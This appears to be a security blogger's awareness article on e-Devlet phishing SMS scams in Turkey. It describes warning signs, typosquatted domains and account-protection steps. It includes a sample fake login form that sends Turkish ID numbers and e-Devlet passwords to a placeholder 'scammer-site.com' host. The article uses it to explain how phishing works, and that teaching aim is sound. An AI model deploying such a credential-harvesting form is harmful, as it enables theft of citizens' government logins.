As we enter 2026, digital scam methods in Turkey have become increasingly sophisticated. Especially fake SMS messages and phishing links targeting e-Devlet are among the most common traps used to obtain citizens’ personal and financial information. Such scams can lead not only to financial losses but also to serious data breaches and personal security vulnerabilities.
I have been working in system and network security for over twenty years; I have experienced many technical details, from kernel module blacklists to fail2ban patterns, from switch hardening to ZTNA architectures. However, even the most robust firewalls often fall short against social engineering attacks targeting the human factor. In this article, I will explain the most common scam scenarios in Turkey in 2026, how to recognize them, and how to protect ourselves, based on my own experiences.
Why is the e-Devlet Trap So Widespread in 2026?
The e-Devlet trap has become one of the most common scam methods in Turkey in 2026 because e-Devlet is perceived as a central and reliable platform that allows citizens to perform all their government transactions through a single portal. This perception offers a great opportunity for scammers to create a false sense of “authorization” and convince victims. Although users’ digital literacy levels vary, the official image of e-Devlet leaves a strong impression on everyone.
A friend of mine, despite being a network engineer at a large technology company, almost fell for a fake SMS that read, “You have an SGK premium debt, click for details: bit.ly/sgk-borc”. He realized how short and untrustworthy the link looked at the last moment. This incident showed me that not only end-users but even tech-savvy individuals can fall for such traps. Scammers usually target basic human emotions such as fear, curiosity, or urgency by using the names of official institutions.
These attacks typically aim to steal critical information such as Turkish ID numbers and e-Devlet passwords by redirecting the user to a fake e-Devlet login page. Fake SMS messages often contain texts like “Enforcement proceedings have been initiated against you,” “Your title deed transfer transaction is awaiting approval,” or “Your test result from the Ministry of Health.” These texts are designed to encourage people to click the link quickly. Although the technical infrastructure behind such SMS messages is often simple, the social engineering aspect is extremely complex.
How to Recognize Fake SMS and Phishing Links?
Fake SMS messages and phishing links usually have distinct characteristics; recognizing them can prevent you from falling into the trap in the initial stage of the scam. Creating a sense of urgency, typos, and using unofficial, shortened, or suspicious URLs are common tactics employed by scammers. These messages are specifically designed to make you react quickly and act without thinking.
I’ve seen thousands of examples in my Android spam blocker app. Scammers constantly change themes like “package delivery delayed,” “your bank account has been suspended,” “you have a tax debt.” The common feature of these messages is to somehow stress you out and make you click the link. No official institution, e-Devlet, or bank will send you an SMS directly asking for personal information or a “click here” link. I always approach such situations with suspicion.
The table below summarizes the key differences between real and fake SMS messages:
| Feature | Real/Official SMS | Fake/Phishing SMS |
|---|---|---|
| Sender Name | Usually a corporate name (e.g., e-Devlet, SGK, Your Bank) | Personal number, unknown number, or a name mimicking a corporate name (e.g., EDEVLET, SGSK) |
| Urgency | Rarely emphasizes urgency, for informational purposes | Urgent phrases like “Immediately”, “Last Day”, “Your Account Will Be Closed” |
| Spelling/Grammar | Error-free, professional language | Spelling and grammar errors, awkward sentences |
| URL Structure | Official institution’s main domain (e.g., turkiye.gov.tr, bankaadi.com.tr) | Shortened URLs (bit.ly, tinyurl), meaningless domains, misspelled official domains (e.g., turkiye-gov.net, e-devletim.org) |
| Personalization | May be specific to your name or Turkish ID number | Generally generic phrases (“Dear citizen”) |
| Information Request | Does not ask for personal information or password via SMS | Requests personal information, password, card number |
This type of attack is actually a kind of “social engineering” attack; just like trying to trick a user into giving up their password instead of finding a weak password for a system. Manipulating the user in some way to convince them to bypass their own security layers is a favorite method of scammers. That’s why you always need to be suspicious of the sender, the link, and the logic of the content.
What is the Technical Operation of Phishing Sites?
Phishing sites are web pages designed to steal user information by mimicking a legitimate site, usually consisting of simple HTML/CSS and a backend script. These sites look exactly like a copy of an official bank or e-Devlet portal. However, their main purpose is to steal your login credentials, credit card numbers, or other sensitive data. There is no complex infrastructure behind these sites; they usually run with a few PHP or Python scripts.
Scammers usually place these fake sites on domain names that look trustworthy but are actually completely different. For example, instead of turkiye.gov.tr, they might use names like turkiye-gov.net or e-devletim.org. This is a tactic known as “domain squatting” or “typosquatting”; it aims to exploit small errors users might make when quickly reading or typing a URL. In the backend, a small script simply saves the entered data to a file or sends it to an email address.
In one of my side products, I constantly worked on rate limiting, JWT (JSON Web Token), and OAuth2 patterns to ensure user security. Phishing sites attack directly at the user, from outside these technical security layers; meaning the vulnerability is not in the system, but in the user themselves. Even there, I had set up IP-based limits or abnormal behavior detection mechanisms to detect fake login attempts. This was also a kind of continuous cat-and-mouse game.
A simple phishing form might look like this:
<!-- Example of a fake e-Devlet login page HTML form -->
<form action="http://scammer-site.com/login.php" method="POST">
<label for="tcKimlik">T.C. Identity No:</label>
<input type="text" id="tcKimlik" name="tcKimlik" required>
<label for="eDevletSifre">e-Devlet Password:</label>
<input type="password" id="eDevletSifre" name="eDevletSifre" required>
<button type="submit">Log In</button>
</form>When the user clicks the Log In button, this HTML form sends the entered tcKimlik and eDevletSifre information to http://scammer-site.com/login.php via a POST request. A simple PHP script named login.php then receives this information, saves it to a file, and perhaps redirects the user to the real e-Devlet site, so the victim suspects nothing. Similarly, just as we use fail2ban to track incorrect password entries and ban the IP during an SSH login attempt, there should also be mechanisms on such sites that can detect erroneous user behavior (entering a password on a fake site). However, this is unfortunately a matter of user awareness.
What Steps Can We Take to Increase Account Security?
The steps we can take to increase account security are the most fundamental way to strengthen our personal fortress in the digital world. Two-factor authentication (2FA), using different and strong passwords for each account, and ensuring device security are the main strategies that will protect us against scams. These steps are the most basic principles of cybersecurity and are vital not only for technical systems but also for individual users.
While working on an internal platform for a bank, I saw that the biggest security vulnerability for users was weak or reused passwords. When a user’s password was compromised, all other accounts using the same password were also at risk. That’s why I enforce 2FA on my own systems; I even use 2FA for SSH (Secure Shell) on my own VPS. This simple precaution makes unauthorized access to your account much more difficult, even if your password is stolen.
Here are practical steps you can take to increase your account security:
- Use Two-Factor Authentication (2FA): Activate 2FA on all your important accounts (bank, e-Devlet, email, social media). Prefer Authenticator apps (Google Authenticator, Authy, Microsoft Authenticator) over SMS-based 2FA. SMS is less secure due to SIM card scams (SIM-swapping).
- Set Strong and Different Passwords: Use unique, long, and complex passwords for each platform. Password managers (KeePass, Bitwarden, 1Password) lighten this load and help you store your passwords securely. Dealing with the “Forgot password” feature is much easier than trying to recover a stolen account.
- Keep Your Devices Updated: Regularly update your operating system (Windows, macOS, Android, iOS) and all applications you use. Security patches close known security vulnerabilities, protecting your devices from potential attacks. Even on Linux, I regularly follow kernel updates, and this also applies to mobile devices.
- Use Reliable Antivirus/Antimalware Software: Have reliable antivirus or antimalware software on your computer and phone and perform regular scans. This software helps you detect and remove malicious software.
These steps apply to both technically knowledgeable users and general users. Remember, digital security is a process, not a one-time operation.
Developing Psychological Resilience Against Phishing Attacks
Developing psychological resilience against phishing attacks is as important as technical measures; because scammers often aim to trigger basic human emotions such as urgency, fear, or curiosity to make you make quick and thoughtless decisions. Recognizing this emotional manipulation and questioning the intent behind the message is key to not falling into the trap. Even the most advanced firewalls cannot prevent a user from voluntarily entering information on a fake site.
While developing enterprise software, I saw how important user training was. Even when designing operator screens in ERP systems, I tried to design simple and understandable interfaces, taking into account factors such as user fatigue and distraction. But with phishing, the situation is different; here, a malicious party targets the user’s weak moments. That’s why we have to invest in the human factor and raise awareness as much as in technical solutions.
For example, an SMS like “Urgent! Your bank account has been suspended, update it immediately via this link: banka-destek.net” aims to create panic and make you click the link. Similarly, in an ERP of a manufacturing company, the late shipment report was always incomplete. It took three days to find the reason: an operator had clicked on a fake “system update” email they received and infected their system with malware. This was a concrete example showing that technical knowledge is not always enough.